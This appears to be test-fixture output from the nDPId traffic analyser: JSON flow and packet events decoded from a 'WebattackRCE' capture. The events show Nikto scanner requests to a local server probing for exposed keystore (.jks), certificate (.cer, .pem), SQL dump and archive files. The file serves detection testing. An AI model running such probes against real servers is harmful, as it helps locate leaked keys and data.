-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 